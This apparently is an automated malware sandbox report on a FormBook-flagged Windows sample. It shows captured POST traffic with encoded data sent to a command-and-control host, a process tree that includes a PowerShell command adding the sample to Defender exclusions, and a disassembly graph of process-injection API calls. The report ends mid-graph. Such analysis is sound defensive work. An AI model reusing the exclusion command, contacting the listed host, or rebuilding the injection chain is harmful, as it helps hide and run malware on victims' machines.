                                              Date: Mon, 01 Jul 2024 14:19:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA==
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.54977931.186.11.254803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:16.252042055 CEST806OUTPOST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 30 33 48 75 4e 52 79 77 31 6e 4e 61 77 75 42 58 71 58 39 55 44 61 77 4c 49 2f 6e 51 59 50 63 51 57 4d 73 4c 44 44 69 7a 74 63 41 58 44 70 50 4f 52 64 66 5a 52 4f 38 63 52 44 4c 55 76 6a 57 32 6e 34 75 6a 57 31 66 70 4c 67 6c 6f 62 73 79 61 46 51 5a 2f 63 79 32 70 59 75 62 68 4e 52 70 69 36 54 75 71 5a 59 30 68 69 42 67 35 41 30 79 38 37 6e 57 6c 71 77 30 31 63 78 65 47 46 69 33 36 69 52 2f 41 36 4d 70 54 41 37 74 51 7a 42 34 6e 52 64 34 76 50 56 4d 41 39 4b 53 47 41 6e 32 77 42 52 49 65 2f 45 63 56 63 55 42 4d 33 6a 72 71 34 32 6d 65 65 6f 32 50 58 34 41 4f 78 52 73 32 65 6f 4b 6e 30 79 45 3d
                                              Data Ascii: 4dV43tA=03HuNRyw1nNawuBXqX9UDawLI/nQYPcQWMsLDDiztcAXDpPORdfZRO8cRDLUvjW2n4ujW1fpLglobsyaFQZ/cy2pYubhNRpi6TuqZY0hiBg5A0y87nWlqw01cxeGFi36iR/A6MpTA7tQzB4nRd4vPVMA9KSGAn2wBRIe/EcVcUBM3jrq42meeo2PX4AOxRs2eoKn0yE=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.54978031.186.11.254803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:18.868393898 CEST826OUTPOST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 30 33 48 75 4e 52 79 77 31 6e 4e 61 78 50 78 58 73 45 56 55 42 36 77 49 55 76 6e 51 53 76 64 5a 57 4d 6f 4c 44 42 50 32 74 75 55 58 61 4d 7a 4f 51 66 37 5a 63 75 38 63 5a 6a 4c 4e 69 44 58 34 6e 34 71 61 57 33 37 70 4c 67 68 6f 62 75 71 61 46 6a 42 34 4f 53 32 72 55 4f 62 6e 4a 52 70 69 36 54 75 71 5a 59 67 48 69 42 34 35 63 56 43 38 36 47 57 6b 72 77 30 30 4d 68 65 47 50 43 32 7a 69 52 2b 6c 36 4a 4a 31 41 35 56 51 7a 41 49 6e 53 4d 34 73 63 31 4d 43 79 71 54 5a 4e 45 4f 30 4c 51 51 76 2f 56 64 67 48 48 42 59 32 56 47 41 69 55 75 32 4e 49 61 33 48 72 49 35 67 68 4e 66 45 4c 61 58 71 6c 53 56 69 73 75 61 67 6f 73 71 51 49 36 70 41 39 48 48 66 35 75 4e
                                              Data Ascii: 4dV43tA=03HuNRyw1nNaxPxXsEVUB6wIUvnQSvdZWMoLDBP2tuUXaMzOQf7Zcu8cZjLNiDX4n4qaW37pLghobuqaFjB4OS2rUObnJRpi6TuqZYgHiB45cVC86GWkrw00MheGPC2ziR+l6JJ1A5VQzAInSM4sc1MCyqTZNEO0LQQv/VdgHHBY2VGAiUu2NIa3HrI5ghNfELaXqlSVisuagosqQI6pA9HHf5uN


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.54978131.186.11.25480
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:21.871066093 CEST1843OUTPOST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 30 33 48 75 4e 52 79 77 31 6e 4e 61 78 50 78 58 73 45 56 55 42 36 77 49 55 76 6e 51 53 76 64 5a 57 4d 6f 4c 44 42 50 32 74 75 4d 58 47 75 4c 4f 52 2b 37 5a 64 75 38 63 61 6a 4c 49 69 44 58 31 6e 34 54 53 57 33 47 55 4c 69 70 6f 61 4c 2b 61 44 57 31 34 58 69 32 72 63 75 62 69 4e 52 70 33 36 54 2b 75 5a 59 77 48 69 42 34 35 63 57 71 38 2b 58 57 6b 70 77 30 31 63 78 65 30 46 69 32 62 69 56 53 54 36 4a 4d 4f 41 70 31 51 39 41 59 6e 55 2b 51 73 66 56 4d 4d 6d 4b 54 52 4e 46 7a 71 4c 51 39 57 2f 56 35 4f 48 48 35 59 33 51 72 6b 6d 51 79 41 52 2b 57 42 41 63 77 76 31 6d 74 73 4c 6f 36 35 33 56 36 62 70 4e 36 46 71 38 59 61 53 34 6e 58 61 5a 50 63 54 75 6a 73 45 55 5a 36 68 34 6a 32 5a 57 32 59 7a 7a 39 69 6b 45 76 30 68 2f 32 49 36 69 65 62 61 75 77 52 6b 59 6a 6c 36 54 61 77 48 6c 39 66 44 64 45 49 56 57 73 4a 62 2f 70 69 56 75 33 32 31 54 4c 52 4d 41 41 77 76 4c 53 6c 62 47 62 79 4d 47 4a 69 73 4f 30 6d 50 75 2b 77 4b 7a 61 65 75 67 54 75 6e 69 79 53 55 5a 70 36 4e 76 4f 31 69 69 [TRUNCATED]
                                              Data Ascii: 4dV43tA=03HuNRyw1nNaxPxXsEVUB6wIUvnQSvdZWMoLDBP2tuMXGuLOR+7Zdu8cajLIiDX1n4TSW3GULipoaL+aDW14Xi2rcubiNRp36T+uZYwHiB45cWq8+XWkpw01cxe0Fi2biVST6JMOAp1Q9AYnU+QsfVMMmKTRNFzqLQ9W/V5OHH5Y3QrkmQyAR+WBAcwv1mtsLo653V6bpN6Fq8YaS4nXaZPcTujsEUZ6h4j2ZW2Yzz9ikEv0h/2I6iebauwRkYjl6TawHl9fDdEIVWsJb/piVu321TLRMAAwvLSlbGbyMGJisO0mPu+wKzaeugTuniySUZp6NvO1iir5+5ijI3rACrRRcpSLvKLrPc+5ZjkxFS+8sa33tatWYiH2n7CxFZqOQaEAJkiSFSEu6FReAeVcgMyDKL5MXQ7LRj9yX4M5Pja2mTAroVCa4fX5YzEQOv5D6V7nexuBUCvx7O7HeK5BIMJzpACxcg6SDc1B7sqXPa7TYGRqrHnk+4Va80hHk2STVGTrFulKhhPPuM7WK08ETY4oBG9zqtzbVFmXhDenVKJljeCR2aRsY0yFlPQ6HsxPJdjTCh2d1bBiAXU3Dq7c/dT+mIkOtbDShw0WqVaVdhRv+O3EqfbOfabZPrdgUXRwWT5PSg9TYZJyP53yhyQfKVQu0OZdZTjvEJpIJy4WPEu2igWGAHevNC/fFYfSJsEB7Tzy890AV31RrHUdieW24nJ+Jqhf6mSOYyvqSysyVCX/P2wWjrVHz4fkjH0MHA2z179IeB8lxSixjI85NjLqixFFmmXb+rA2F9eGTHJ9yP2CY+3HRM9JlypkwmhEWrqO0wkBaeT38r0wyBYlHtCWrDNAMGA/cqcaa2ITnzQVoCxP3KWoGNWbcROScnvU33S8iozwjtENrDh90XI0r3hcZIhrYGl8shZyytRV7BSEIrNlkkdSgn4Am7fdTUM3QcS+QliY/LKC0ECDNPEg9Wy4QfdVZqUNVgG6nh5DkcWvl/b2 [TRUNCATED]


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:10:15:11
                                              Start date:01/07/2024
                                              Path:C:\Users\user\Desktop\rPRESUPUESTO.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0x4e0000
                                              File size:713'736 bytes
                                              MD5 hash:E78D43A26913CF101B98D1D04839EEE2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0x700000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Users\user\Desktop\rPRESUPUESTO.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0xc40000
                                              File size:713'736 bytes
                                              MD5 hash:E78D43A26913CF101B98D1D04839EEE2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:10:15:18
                                              Start date:01/07/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6ef0c0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:10:15:26
                                              Start date:01/07/2024
                                              Path:C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe"
                                              Imagebase:0x980000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:10:15:27
                                              Start date:01/07/2024
                                              Path:C:\Windows\SysWOW64\ktmutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                              Imagebase:0x7b0000
                                              File size:15'360 bytes
                                              MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:10
                                              Start time:10:15:40
                                              Start date:01/07/2024
                                              Path:C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe"
                                              Imagebase:0x980000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:13
                                              Start time:10:15:52
                                              Start date:01/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:8.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:2.1%
                                                Total number of Nodes:238
                                                Total number of Limit Nodes:11
                                                execution_graph 25471 110d3c0 25472 110d406 25471->25472 25476 110d590 25472->25476 25479 110d5a0 25472->25479 25473 110d4f3 25482 110b034 25476->25482 25480 110b034 DuplicateHandle 25479->25480 25481 110d5ce 25479->25481 25480->25481 25481->25473 25483 110d608 DuplicateHandle 25482->25483 25484 110d5ce 25483->25484 25484->25473 25284 787a203 25288 787afa6 25284->25288 25307 787afa8 25284->25307 25285 787a16f 25289 787afa8 25288->25289 25290 787afca 25289->25290 25326 787b585 25289->25326 25331 787b759 25289->25331 25337 787bcfd 25289->25337 25346 787b8d0 25289->25346 25352 787b7b1 25289->25352 25356 787b4d1 25289->25356 25361 787ba31 25289->25361 25367 787ba13 25289->25367 25373 787b653 25289->25373 25379 787b573 25289->25379 25385 787b736 25289->25385 25391 787b429 25289->25391 25395 787b889 25289->25395 25400 787b669 25289->25400 25405 787b80c 25289->25405 25411 787baad 25289->25411 25290->25285 25308 787afc2 25307->25308 25309 787afca 25308->25309 25310 787b585 2 API calls 25308->25310 25311 787baad 3 API calls 25308->25311 25312 787b80c 4 API calls 25308->25312 25313 787b669 2 API calls 25308->25313 25314 787b889 2 API calls 25308->25314 25315 787b429 2 API calls 25308->25315 25316 787b736 3 API calls 25308->25316 25317 787b573 4 API calls 25308->25317 25318 787b653 2 API calls 25308->25318 25319 787ba13 3 API calls 25308->25319 25320 787ba31 4 API calls 25308->25320 25321 787b4d1 2 API calls 25308->25321 25322 787b7b1 2 API calls 25308->25322 25323 787b8d0 4 API calls 25308->25323 25324 787bcfd 4 API calls 25308->25324 25325 787b759 3 API calls 25308->25325 25309->25285 25310->25309 25311->25309 25312->25309 25313->25309 25314->25309 25315->25309 25316->25309 25317->25309 25318->25309 25319->25309 25320->25309 25321->25309 25322->25309 25323->25309 25324->25309 25325->25309 25327 787b5a8 25326->25327 25417 78798b0 25327->25417 25421 78798a8 25327->25421 25328 787bb39 25332 787b73a 25331->25332 25425 7879230 25332->25425 25429 787922b 25332->25429 25433 78792cf 25332->25433 25333 787badd 25333->25333 25338 787bd03 25337->25338 25339 787b824 25338->25339 25342 78799a0 ReadProcessMemory 25338->25342 25343 7879998 ReadProcessMemory 25338->25343 25438 78799a0 25339->25438 25442 7879998 25339->25442 25446 7879718 25339->25446 25450 7879710 25339->25450 25342->25339 25343->25339 25347 787b824 25346->25347 25348 7879710 Wow64SetThreadContext 25347->25348 25349 7879718 Wow64SetThreadContext 25347->25349 25350 78799a0 ReadProcessMemory 25347->25350 25351 7879998 ReadProcessMemory 25347->25351 25348->25347 25349->25347 25350->25347 25351->25347 25454 78797f0 25352->25454 25458 78797e8 25352->25458 25353 787b7cf 25357 787b969 25356->25357 25359 7879710 Wow64SetThreadContext 25357->25359 25360 7879718 Wow64SetThreadContext 25357->25360 25358 787b984 25359->25358 25360->25358 25362 787b823 25361->25362 25363 7879710 Wow64SetThreadContext 25362->25363 25364 7879718 Wow64SetThreadContext 25362->25364 25365 78799a0 ReadProcessMemory 25362->25365 25366 7879998 ReadProcessMemory 25362->25366 25363->25362 25364->25362 25365->25362 25366->25362 25368 787ba20 25367->25368 25370 7879230 ResumeThread 25368->25370 25371 78792cf ResumeThread 25368->25371 25372 787922b ResumeThread 25368->25372 25369 787badd 25370->25369 25371->25369 25372->25369 25374 787b680 25373->25374 25375 787b7ab 25374->25375 25377 78798b0 WriteProcessMemory 25374->25377 25378 78798a8 WriteProcessMemory 25374->25378 25375->25290 25376 787b481 25376->25290 25377->25376 25378->25376 25380 787b824 25379->25380 25381 78799a0 ReadProcessMemory 25380->25381 25382 7879998 ReadProcessMemory 25380->25382 25383 7879710 Wow64SetThreadContext 25380->25383 25384 7879718 Wow64SetThreadContext 25380->25384 25381->25380 25382->25380 25383->25380 25384->25380 25386 787b751 25385->25386 25388 7879230 ResumeThread 25386->25388 25389 78792cf ResumeThread 25386->25389 25390 787922b ResumeThread 25386->25390 25387 787badd 25388->25387 25389->25387 25390->25387 25462 7879b2c 25391->25462 25467 7879b38 25391->25467 25396 787b892 25395->25396 25398 78798b0 WriteProcessMemory 25396->25398 25399 78798a8 WriteProcessMemory 25396->25399 25397 787b93c 25398->25397 25399->25397 25401 787b66f 25400->25401 25403 78798b0 WriteProcessMemory 25401->25403 25404 78798a8 WriteProcessMemory 25401->25404 25402 787b481 25402->25290 25403->25402 25404->25402 25406 787b812 25405->25406 25407 78799a0 ReadProcessMemory 25406->25407 25408 7879998 ReadProcessMemory 25406->25408 25409 7879710 Wow64SetThreadContext 25406->25409 25410 7879718 Wow64SetThreadContext 25406->25410 25407->25406 25408->25406 25409->25406 25410->25406 25412 787bab2 25411->25412 25414 7879230 ResumeThread 25412->25414 25415 78792cf ResumeThread 25412->25415 25416 787922b ResumeThread 25412->25416 25413 787badd 25414->25413 25415->25413 25416->25413 25418 78798f8 WriteProcessMemory 25417->25418 25420 787994f 25418->25420 25420->25328 25422 78798b0 WriteProcessMemory 25421->25422 25424 787994f 25422->25424 25424->25328 25426 7879270 ResumeThread 25425->25426 25428 78792a1 25426->25428 25428->25333 25430 7879270 ResumeThread 25429->25430 25432 78792a1 25430->25432 25432->25333 25434 787925b 25433->25434 25435 787927a ResumeThread 25434->25435 25437 78792db 25434->25437 25436 78792a1 25435->25436 25436->25333 25437->25333 25439 78799eb ReadProcessMemory 25438->25439 25441 7879a2f 25439->25441 25441->25339 25443 787999d ReadProcessMemory 25442->25443 25445 7879a2f 25443->25445 25445->25339 25447 787975d Wow64SetThreadContext 25446->25447 25449 78797a5 25447->25449 25449->25339 25451 787975d Wow64SetThreadContext 25450->25451 25453 78797a5 25451->25453 25453->25339 25455 7879830 VirtualAllocEx 25454->25455 25457 787986d 25455->25457 25457->25353 25459 7879830 VirtualAllocEx 25458->25459 25461 787986d 25459->25461 25461->25353 25463 7879b33 CreateProcessA 25462->25463 25464 7879abb 25462->25464 25466 7879d83 25463->25466 25464->25290 25466->25466 25468 7879bc1 CreateProcessA 25467->25468 25470 7879d83 25468->25470 25470->25470 25485 1104668 25486 110467a 25485->25486 25487 1104686 25486->25487 25491 1104779 25486->25491 25496 1103e40 25487->25496 25489 11046a5 25492 110479d 25491->25492 25500 1104888 25492->25500 25504 1104879 25492->25504 25497 1103e4b 25496->25497 25512 1105c8c 25497->25512 25499 110707b 25499->25489 25501 11048af 25500->25501 25502 110498c 25501->25502 25508 11044c4 25501->25508 25505 11048af 25504->25505 25506 110498c 25505->25506 25507 11044c4 CreateActCtxA 25505->25507 25507->25506 25509 1105918 CreateActCtxA 25508->25509 25511 11059db 25509->25511 25513 1105c97 25512->25513 25516 1105e64 25513->25516 25515 110792d 25515->25499 25517 1105e6f 25516->25517 25520 11074a4 25517->25520 25519 1107a02 25519->25515 25521 11074af 25520->25521 25524 11074d4 25521->25524 25523 1107b05 25523->25519 25526 11074df 25524->25526 25525 1108a36 25526->25525 25528 1108d73 25526->25528 25532 110ac13 25526->25532 25527 1108db1 25527->25523 25528->25527 25536 110cce0 25528->25536 25541 110ccf0 25528->25541 25546 110b050 25532->25546 25549 110b043 25532->25549 25533 110ac26 25533->25528 25537 110cd11 25536->25537 25538 110cd35 25537->25538 25573 110d2a8 25537->25573 25577 110d299 25537->25577 25538->25527 25542 110cd11 25541->25542 25543 110cd35 25542->25543 25544 110d2a8 2 API calls 25542->25544 25545 110d299 2 API calls 25542->25545 25543->25527 25544->25543 25545->25543 25553 110b148 25546->25553 25547 110b05f 25547->25533 25550 110b050 25549->25550 25552 110b148 2 API calls 25550->25552 25551 110b05f 25551->25533 25552->25551 25554 110b159 25553->25554 25555 110b17c 25553->25555 25554->25555 25561 110b3e0 25554->25561 25565 110b3d1 25554->25565 25555->25547 25556 110b174 25556->25555 25557 110b380 GetModuleHandleW 25556->25557 25558 110b3ad 25557->25558 25558->25547 25562 110b3f4 25561->25562 25564 110b419 25562->25564 25569 110ae58 25562->25569 25564->25556 25566 110b3f4 25565->25566 25567 110ae58 LoadLibraryExW 25566->25567 25568 110b419 25566->25568 25567->25568 25568->25556 25570 110b5a0 LoadLibraryExW 25569->25570 25572 110b619 25570->25572 25572->25564 25575 110d2b5 25573->25575 25574 110d2ef 25574->25538 25575->25574 25581 110d0d0 25575->25581 25578 110d2b5 25577->25578 25579 110d0d0 2 API calls 25578->25579 25580 110d2ef 25578->25580 25579->25580 25580->25538 25582 110d0db 25581->25582 25584 110dc00 25582->25584 25585 110d1ec 25582->25585 25584->25584 25586 110d1f7 25585->25586 25587 11074d4 2 API calls 25586->25587 25588 110dc6f 25587->25588 25588->25584 25589 787c178 25590 787c303 25589->25590 25592 787c19e 25589->25592 25592->25590 25593 78729f0 25592->25593 25594 787c3f8 PostMessageW 25593->25594 25595 787c464 25594->25595 25595->25592

                                                Executed Functions

                                                Function 078792CF Relevance: 1.7, APIs: 1, Instructions: 175threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 572 78792cf-78792d1 573 78792d3-78792d9 572->573 574 787925b-787925d 572->574 575 7879263-787929f ResumeThread 573->575 576 78792db-787930f 573->576 574->575 589 78792a1-78792a7 575->589 590 78792a8-78792cd 575->590 578 7879316-787936f 576->578 579 7879311 576->579 581 7879375-7879377 578->581 582 7879482-7879493 578->582 579->578 581->582 584 787937d-78793ad 581->584 585 7879495-7879497 582->585 586 787950b-787951c 582->586 591 78793b4-78793c5 584->591 592 78793af 584->592 585->586 593 7879499-78794a9 585->593 587 7879522-7879524 586->587 588 78796fb-7879705 586->588 587->588 598 787952a-787955a 587->598 589->590 596 78793c7 591->596 597 78793cc-78793e2 591->597 592->591 594 78794ab-78794b8 593->594 595 78794ba 593->595 601 78794bd-78794f8 594->601 595->601 596->597 602 78793e4 597->602 603 78793e9-78793ff 597->603 604 7879561-7879572 598->604 605 787955c 598->605 621 78794ff-7879506 601->621 622 78794fa 601->622 602->603 609 7879406-7879461 603->609 610 7879401 603->610 607 7879574 604->607 608 7879579-787958f 604->608 605->604 607->608 611 7879596-78795ac 608->611 612 7879591 608->612 631 7879463-7879469 609->631 632 787946b 609->632 610->609 615 78795b3-78795f0 611->615 616 78795ae 611->616 612->611 619 78795f7-7879608 615->619 620 78795f2 615->620 616->615 623 787960f-7879625 619->623 624 787960a 619->624 620->619 621->588 622->621 626 7879627 623->626 627 787962c-7879642 623->627 624->623 626->627 629 7879644 627->629 630 7879649-7879668 627->630 629->630 633 7879672 630->633 634 787966a-7879670 630->634 635 787946e-787947d 631->635 632->635 636 7879675-78796e3 633->636 634->636 635->588 643 78796e5-78796eb 636->643 644 